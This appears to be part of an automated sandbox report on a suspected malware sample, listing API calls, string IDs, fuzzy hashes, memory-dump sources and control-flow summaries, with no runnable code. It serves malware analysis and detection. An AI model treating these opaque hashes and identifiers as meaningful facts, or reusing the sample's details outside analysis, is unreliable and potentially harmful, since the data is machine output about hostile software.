                                                                  • Instruction ID: bb47a281175ab0c53f9cea9f9cb2bcb8d73e7047ae2ac0c9ec6b36e3ee78b24b
                                                                  • Opcode Fuzzy Hash: d74347e8e2a3abc78d07dff3a200588cf5cf38563359e4588214b8e5ccaefc37
                                                                  • Instruction Fuzzy Hash: 35A1C17190121A9FDB21DBA8C949B6ABFF8FF45310F04816EE815E7341EB34EA04CB91
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.4092705885.00000000005C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 005C0000, based on PE: true
                                                                  • Associated: 00000003.00000002.4092626649.00000000005C0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4092705885.0000000000622000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093024357.0000000000629000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.000000000062B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000007A4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.0000000000880000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000008AC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000008B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000008C2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4095186859.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4095868978.0000000000A54000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4095897445.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_5c0000_explorti.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _wcsrchr
                                                                  • String ID: .bat$.cmd$.com$.exe
                                                                  • API String ID: 1752292252-4019086052
                                                                  • Opcode ID: ab72e91ad9bdd379a7eb4a68fa57dae492ff53b4d883266dcfcdf2cf68f3d4a8
                                                                  • Instruction ID: f922f432d1d78522841d5a10c57a439cde4a1d572b779362b91cecfb7b010836
                                                                  • Opcode Fuzzy Hash: ab72e91ad9bdd379a7eb4a68fa57dae492ff53b4d883266dcfcdf2cf68f3d4a8
                                                                  • Instruction Fuzzy Hash: 8501C437B4871F25661460199D02A775F99EFD6BB4B2A002AFA44F72C2EE9CDC52C1A0
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.4092705885.00000000005C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 005C0000, based on PE: true
                                                                  • Associated: 00000003.00000002.4092626649.00000000005C0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4092705885.0000000000622000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093024357.0000000000629000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.000000000062B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000007A4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.0000000000880000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000008AC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000008B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000008C2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4095186859.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4095868978.0000000000A54000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4095897445.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_5c0000_explorti.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _strrchr
                                                                  • String ID:
                                                                  • API String ID: 3213747228-0
                                                                  • Opcode ID: 7941c91dc3c81985f55d5af0d0e5d35b4c2fcc41726f6f06d2574da038ee3747
                                                                  • Instruction ID: 8b4508d2a5da6eddfbb2bd71ef3cee47e4108210ecc972b705f2cd37edad8c10
                                                                  • Opcode Fuzzy Hash: 7941c91dc3c81985f55d5af0d0e5d35b4c2fcc41726f6f06d2574da038ee3747
                                                                  • Instruction Fuzzy Hash: D8B1153290064E9FDB15CF68C9827BEBFE6FF85340F1485BAD695AB241D6389D01CB60
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.4092705885.00000000005C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 005C0000, based on PE: true
                                                                  • Associated: 00000003.00000002.4092626649.00000000005C0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4092705885.0000000000622000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093024357.0000000000629000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.000000000062B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000007A4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.0000000000880000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000008AC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000008B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000008C2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4095186859.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4095868978.0000000000A54000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4095897445.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_5c0000_explorti.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Xtime_diff_to_millis2_xtime_get
                                                                  • String ID:
                                                                  • API String ID: 531285432-0
                                                                  • Opcode ID: 550d1f7ce22af4fa9991b5f006086c3e76183406ac8ae70ecf2f640fc5bd7282
                                                                  • Instruction ID: 5f8da38242433a880f35e6a9f2ae2f08e1b2fbee81c1628653c31a2fcbe9b06a
                                                                  • Opcode Fuzzy Hash: 550d1f7ce22af4fa9991b5f006086c3e76183406ac8ae70ecf2f640fc5bd7282
                                                                  • Instruction Fuzzy Hash: 4E213B71A0011AAFEF11EFA8D8859BEBFB9FF48710B500057F901A7351DB70AE419BA0
                                                                  APIs
                                                                  • __Mtx_init_in_situ.LIBCPMT ref: 005D723C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.4092705885.00000000005C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 005C0000, based on PE: true
                                                                  • Associated: 00000003.00000002.4092626649.00000000005C0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4092705885.0000000000622000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093024357.0000000000629000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.000000000062B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000007A4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.0000000000880000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000008AC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000008B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000008C2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4095186859.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4095868978.0000000000A54000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4095897445.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_5c0000_explorti.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Mtx_init_in_situ
                                                                  • String ID: 0z]$py]
                                                                  • API String ID: 3366076730-3484672062
                                                                  • Opcode ID: 0356c6633bc321faaba4591e2cf0154e09e7d71526038634cbb8d0fb2bf75bb5
                                                                  • Instruction ID: 5d4aaab7aa9ebeed953dd74e9fd45d629420923dce66cb31d8547a3e1dcea6fa
                                                                  • Opcode Fuzzy Hash: 0356c6633bc321faaba4591e2cf0154e09e7d71526038634cbb8d0fb2bf75bb5
                                                                  • Instruction Fuzzy Hash: 89A126B4A01619CFDB21CFA8C98479ABBF1BF48710F19815AE819AB351E7759D01CB90
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.4092705885.00000000005C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 005C0000, based on PE: true
                                                                  • Associated: 00000003.00000002.4092626649.00000000005C0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4092705885.0000000000622000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093024357.0000000000629000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.000000000062B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000007A4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.0000000000880000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000008AC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000008B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000008C2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4095186859.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4095868978.0000000000A54000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4095897445.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_5c0000_explorti.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ___free_lconv_mon
                                                                  • String ID: 8"b$`'b
                                                                  • API String ID: 3903695350-2978542851
                                                                  • Opcode ID: f305e903c31e6453a5f27f2e1963b2b5f78ad22ae9e0e5585f1f8eb01acc3314
                                                                  • Instruction ID: 70235bad82362d6a83e2f5c84eaf9929e831ff8b16d8c514b488ff37eb2471b9
                                                                  • Opcode Fuzzy Hash: f305e903c31e6453a5f27f2e1963b2b5f78ad22ae9e0e5585f1f8eb01acc3314
                                                                  • Instruction Fuzzy Hash: 343160B560030E9FDB21AA78DD49B7A7FEABF44310F144829F249DB591DA78EC44CB12

                                                                  Execution Graph

                                                                  Execution Coverage:0.4%
                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                  Signature Coverage:13.6%
                                                                  Total number of Nodes:110
                                                                  Total number of Limit Nodes:12
                                                                  execution_graph 45737 6c053060 ?Startup@TimeStamp@mozilla@ ?Now@TimeStamp@mozilla@@CA?AV12@_N ?InitializeUptime@mozilla@ 45742 6c08ab2a 45737->45742 45741 6c0530db 45746 6c08ae0c _crt_atexit _register_onexit_function 45742->45746 45744 6c0530cd 45745 6c08b320 5 API calls ___raise_securityfailure 45744->45745 45745->45741 45746->45744 45747 6c0535a0 45748 6c0535c4 InitializeCriticalSectionAndSpinCount getenv 45747->45748 45763 6c053846 __aulldiv 45747->45763 45749 6c0538fc strcmp 45748->45749 45754 6c0535f3 __aulldiv 45748->45754 45753 6c053912 strcmp 45749->45753 45749->45754 45751 6c0535f8 QueryPerformanceFrequency 45751->45754 45752 6c0538f4 45753->45754 45754->45751 45755 6c053622 _strnicmp 45754->45755 45756 6c053944 _strnicmp 45754->45756 45758 6c05395d 45754->45758 45759 6c053664 GetSystemTimeAdjustment 45754->45759 45761 6c05375c 45754->45761 45755->45754 45755->45756 45756->45754 45756->45758 45757 6c05376a QueryPerformanceCounter EnterCriticalSection 45760 6c0537b3 LeaveCriticalSection QueryPerformanceCounter EnterCriticalSection 45757->45760 45757->45761 45759->45754 45760->45761 45762 6c0537fc LeaveCriticalSection 45760->45762 45761->45757 45761->45760 45761->45762 45761->45763 45762->45761 45762->45763 45764 6c08b320 5 API calls ___raise_securityfailure 45763->45764 45764->45752 45765 6c08b8ae 45766 6c08b8ba ___scrt_is_nonwritable_in_current_image 45765->45766 45767 6c08b8e3 dllmain_raw 45766->45767 45768 6c08b8de 45766->45768 45777 6c08b8c9 45766->45777 45769 6c08b8fd dllmain_crt_dispatch 45767->45769 45767->45777 45778 6c06bed0 DisableThreadLibraryCalls LoadLibraryExW 45768->45778 45769->45768 45769->45777 45771 6c08b91e 45772 6c08b94a 45771->45772 45779 6c06bed0 DisableThreadLibraryCalls LoadLibraryExW 45771->45779 45773 6c08b953 dllmain_crt_dispatch 45772->45773 45772->45777 45775 6c08b966 dllmain_raw 45773->45775 45773->45777 45775->45777 45776 6c08b936 dllmain_crt_dispatch dllmain_raw 45776->45772 45778->45771 45779->45776 45780 6c06c930 GetSystemInfo VirtualAlloc 45781 6c06c9a3 GetSystemInfo 45780->45781 45782 6c06c973 45780->45782 45784 6c06c9b6 45781->45784 45785 6c06c9d0 45781->45785 45796 6c08b320 5 API calls ___raise_securityfailure 45782->45796 45784->45785 45787 6c06c9bd 45784->45787 45785->45782 45788 6c06c9d8 VirtualAlloc 45785->45788 45786 6c06c99b 45787->45782 45789 6c06c9c1 VirtualFree 45787->45789 45790 6c06c9f0 45788->45790 45791 6c06c9ec 45788->45791 45789->45782 45797 6c08cbe8 GetCurrentProcess TerminateProcess 45790->45797 45791->45782 45796->45786 45798 6c08b9c0 45799 6c08b9c9 45798->45799 45800 6c08b9ce dllmain_dispatch 45798->45800 45802 6c08bef1 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___get_entropy 45799->45802 45802->45800 45803 1073b8c 45804 1073b99 VirtualAlloc 45803->45804 45806 6c08b694 45807 6c08b6a0 ___scrt_is_nonwritable_in_current_image 45806->45807 45836 6c08af2a 45807->45836 45809 6c08b6a7 45810 6c08b6d1 45809->45810 45811 6c08b796 45809->45811 45819 6c08b6ac ___scrt_is_nonwritable_in_current_image 45809->45819 45840 6c08b064 45810->45840 45853 6c08b1f7 IsProcessorFeaturePresent 45811->45853 45814 6c08b6e0 __RTC_Initialize 45814->45819 45843 6c08bf89 InitializeSListHead 45814->45843 45815 6c08b7b3 ___scrt_uninitialize_crt __RTC_Initialize 45817 6c08b6ee ___scrt_initialize_default_local_stdio_options 45822 6c08b6f3 _initterm_e 45817->45822 45818 6c08b79d ___scrt_is_nonwritable_in_current_image 45818->45815 45820 6c08b828 45818->45820 45821 6c08b7d2 45818->45821 45823 6c08b1f7 ___scrt_fastfail 6 API calls 45820->45823 45857 6c08b09d _execute_onexit_table _cexit ___scrt_release_startup_lock 45821->45857 45822->45819 45825 6c08b708 45822->45825 45826 6c08b82f 45823->45826 45844 6c08b072 45825->45844 45832 6c08b83b 45826->45832 45833 6c08b86e dllmain_crt_process_detach 45826->45833 45827 6c08b7d7 45858 6c08bf95 __std_type_info_destroy_list 45827->45858 45829 6c08b70d 45829->45819 45831 6c08b711 _initterm 45829->45831 45831->45819 45834 6c08b860 dllmain_crt_process_attach 45832->45834 45835 6c08b840 45832->45835 45833->45835 45834->45835 45837 6c08af33 45836->45837 45859 6c08b341 IsProcessorFeaturePresent 45837->45859 45839 6c08af3f ___scrt_uninitialize_crt 45839->45809 45860 6c08af8b 45840->45860 45842 6c08b06b 45842->45814 45843->45817 45845 6c08b077 ___scrt_release_startup_lock 45844->45845 45846 6c08b07b 45845->45846 45847 6c08b082 45845->45847 45870 6c08b341 IsProcessorFeaturePresent 45846->45870 45849 6c08b087 _configure_narrow_argv 45847->45849 45851 6c08b092 45849->45851 45852 6c08b095 _initialize_narrow_environment 45849->45852 45850 6c08b080 45850->45829 45851->45829 45852->45850 45854 6c08b20c ___scrt_fastfail 45853->45854 45855 6c08b218 memset memset IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 45854->45855 45856 6c08b302 ___scrt_fastfail 45855->45856 45856->45818 45857->45827 45858->45815 45859->45839 45861 6c08af9a 45860->45861 45862 6c08af9e 45860->45862 45861->45842 45863 6c08b028 45862->45863 45865 6c08afab ___scrt_release_startup_lock 45862->45865 45864 6c08b1f7 ___scrt_fastfail 6 API calls 45863->45864 45866 6c08b02f 45864->45866 45867 6c08afb8 _initialize_onexit_table 45865->45867 45868 6c08afd6 45865->45868 45867->45868 45869 6c08afc7 _initialize_onexit_table 45867->45869 45868->45842 45869->45868 45870->45850

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(6C0DF688,00001000), ref: 6C0535D5
                                                                  • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C0535E0
                                                                  • QueryPerformanceFrequency.KERNEL32(?), ref: 6C0535FD
                                                                  • _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C05363F
                                                                  • GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C05369F
                                                                  • __aulldiv.LIBCMT ref: 6C0536E4
                                                                  • QueryPerformanceCounter.KERNEL32(?), ref: 6C053773
                                                                  • EnterCriticalSection.KERNEL32(6C0DF688), ref: 6C05377E
                                                                  • LeaveCriticalSection.KERNEL32(6C0DF688), ref: 6C0537BD
                                                                  • QueryPerformanceCounter.KERNEL32(?), ref: 6C0537C4
                                                                  • EnterCriticalSection.KERNEL32(6C0DF688), ref: 6C0537CB
                                                                  • LeaveCriticalSection.KERNEL32(6C0DF688), ref: 6C053801
                                                                  • __aulldiv.LIBCMT ref: 6C053883
                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,QPC), ref: 6C053902
                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,GTC), ref: 6C053918
                                                                  • _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,AuthcAMDenti,0000000C), ref: 6C05394C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$PerformanceQuery$CounterEnterLeave__aulldiv_strnicmpstrcmp$AdjustmentCountFrequencyInitializeSpinSystemTimegetenv
                                                                  • String ID: AuthcAMDenti$GTC$GenuntelineI$MOZ_TIMESTAMP_MODE$QPC$3JT/
                                                                  • API String ID: 301339242-456778009
                                                                  • Opcode ID: 4466965e11d64af0e96f1663aa1e5cb845510d589ca05cae529d02cad6a5ecab
                                                                  • Instruction ID: d21d343f58ec60543d79fe8813995e4278a20f3855c6563eaacd0f12198ba363
                                                                  • Opcode Fuzzy Hash: 4466965e11d64af0e96f1663aa1e5cb845510d589ca05cae529d02cad6a5ecab
                                                                  • Instruction Fuzzy Hash: 38B172B1B093109BDB08DF28C94571ABBF9EB8E704F45892DF999D7790DB70A9008B91

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • GetSystemInfo.KERNEL32(?), ref: 6C06C947
                                                                  • VirtualAlloc.KERNEL32(?,?,00002000,00000001), ref: 6C06C969
                                                                  • GetSystemInfo.KERNEL32(?), ref: 6C06C9A9
                                                                  • VirtualFree.KERNEL32(00000000,?,00008000), ref: 6C06C9C8
                                                                  • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001), ref: 6C06C9E2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: Virtual$AllocInfoSystem$Free
                                                                  • String ID: 3JT/
                                                                  • API String ID: 4191843772-2178588373
                                                                  • Opcode ID: 7a11274ab84e17dea14ac0e610c2850252d730d404032fd9ababcd5832967cfa
                                                                  • Instruction ID: 5542755ceb6ea4b37a32ae567d80a0be4b7c011abfb5f130bf7c37a6eef319f9
                                                                  • Opcode Fuzzy Hash: 7a11274ab84e17dea14ac0e610c2850252d730d404032fd9ababcd5832967cfa
                                                                  • Instruction Fuzzy Hash: FF21C231741614ABDF04AE65CC88BAE73FAAB46704F60451AFD07A7E80DF60B8008BB1

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • ?Startup@TimeStamp@mozilla@@SAXXZ.MOZGLUE ref: 6C053095
                                                                    • Part of subcall function 6C0535A0: InitializeCriticalSectionAndSpinCount.KERNEL32(6C0DF688,00001000), ref: 6C0535D5
                                                                    • Part of subcall function 6C0535A0: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C0535E0
                                                                    • Part of subcall function 6C0535A0: QueryPerformanceFrequency.KERNEL32(?), ref: 6C0535FD
                                                                    • Part of subcall function 6C0535A0: _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C05363F
                                                                    • Part of subcall function 6C0535A0: GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C05369F
                                                                    • Part of subcall function 6C0535A0: __aulldiv.LIBCMT ref: 6C0536E4
                                                                  • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C05309F
                                                                    • Part of subcall function 6C075B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6C0756EE,?,00000001), ref: 6C075B85
                                                                    • Part of subcall function 6C075B50: EnterCriticalSection.KERNEL32(6C0DF688,?,?,?,6C0756EE,?,00000001), ref: 6C075B90
                                                                    • Part of subcall function 6C075B50: LeaveCriticalSection.KERNEL32(6C0DF688,?,?,?,6C0756EE,?,00000001), ref: 6C075BD8
                                                                    • Part of subcall function 6C075B50: GetTickCount64.KERNEL32 ref: 6C075BE4
                                                                  • ?InitializeUptime@mozilla@@YAXXZ.MOZGLUE ref: 6C0530BE
                                                                    • Part of subcall function 6C0530F0: QueryUnbiasedInterruptTime.KERNEL32 ref: 6C053127
                                                                    • Part of subcall function 6C0530F0: __aulldiv.LIBCMT ref: 6C053140
                                                                    • Part of subcall function 6C08AB2A: __onexit.LIBCMT ref: 6C08AB30
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: Time$CriticalQuerySection$InitializePerformanceStamp@mozilla@@__aulldiv$AdjustmentCountCount64CounterEnterFrequencyInterruptLeaveNow@SpinStartup@SystemTickUnbiasedUptime@mozilla@@V12@___onexit_strnicmpgetenv
                                                                  • String ID: 3JT/
                                                                  • API String ID: 4291168024-2178588373
                                                                  • Opcode ID: 1d7376c0c7775ef6fc4ece5567ae75409e5fc0a4c7807b671b5b4fe95a88521e
                                                                  • Instruction ID: 2c63ecec8b5f0147ae9b32a6b7631d3a3cfad1eebd14e88c76baa65616c6ff92
                                                                  • Opcode Fuzzy Hash: 1d7376c0c7775ef6fc4ece5567ae75409e5fc0a4c7807b671b5b4fe95a88521e
                                                                  • Instruction Fuzzy Hash: 11F08612D2474897CA10DF7488413E6B7BCAF6B114B54D719FC5467A61FF2071D88395

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 118 1073b8c-1073b97 119 1073ba0-1073ba3 118->119 120 1073b99-1073b9e 118->120 121 1073baa-1073bbe VirtualAlloc 119->121 122 1073ba5 119->122 120->121 122->121
                                                                  APIs
                                                                  • VirtualAlloc.KERNEL32(?,?,?,?), ref: 01073BB7
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1957654994.0000000001066000.00000040.00000001.01000000.00000009.sdmp, Offset: 00F1C000, based on PE: true
                                                                  • Associated: 00000004.00000002.1957654994.0000000000F1C000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1957654994.000000000104C000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1957654994.0000000001089000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1957654994.00000000010F5000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1957654994.0000000001413000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_ce0000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: AllocVirtual
                                                                  • String ID:
                                                                  • API String ID: 4275171209-0
                                                                  • Opcode ID: ff8736eef0a5e9f141e7205e7e23646867707e473658af724a67a86dc26fffa2
                                                                  • Instruction ID: e731941ff193f96b8738a210594e8ce1d54aff2077a92d023be307758b7d6238
                                                                  • Opcode Fuzzy Hash: ff8736eef0a5e9f141e7205e7e23646867707e473658af724a67a86dc26fffa2
                                                                  • Instruction Fuzzy Hash: C9E0EC7570010C9BEB50CD5CD845BAB33DDF788210F14C011F649DB605C235E81097A5

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 295 1012e84-1012e93 call f22d28 298 1012e98-1012e9d call f2ba50 295->298 300 1012ea2-1012ea5 298->300 301 1012eab-1012eb9 300->301 302 1012f2e-1012f31 300->302 303 1012ebb-1012ec9 call f7df44 301->303 304 1012f2c 301->304 305 1012f33-1012f3d call 1012c64 302->305 306 1012f3f-1012f41 302->306 303->304 311 1012ecb-1012eed call f22d28 303->311 304->302 305->306 306->298 314 1012f07-1012f15 311->314 315 1012eef-1012f05 311->315 314->304 316 1012f17-1012f27 call 1013640 314->316 315->314 316->304
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1957654994.0000000000F1C000.00000040.00000001.01000000.00000009.sdmp, Offset: 00CE0000, based on PE: true
                                                                  • Associated: 00000004.00000002.1957625713.0000000000CE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1957654994.0000000000CE1000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1957654994.0000000000D28000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1957654994.0000000000D86000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1957654994.0000000000E2A000.00000040.00000001.01000000.00000009.sdmpDownload File
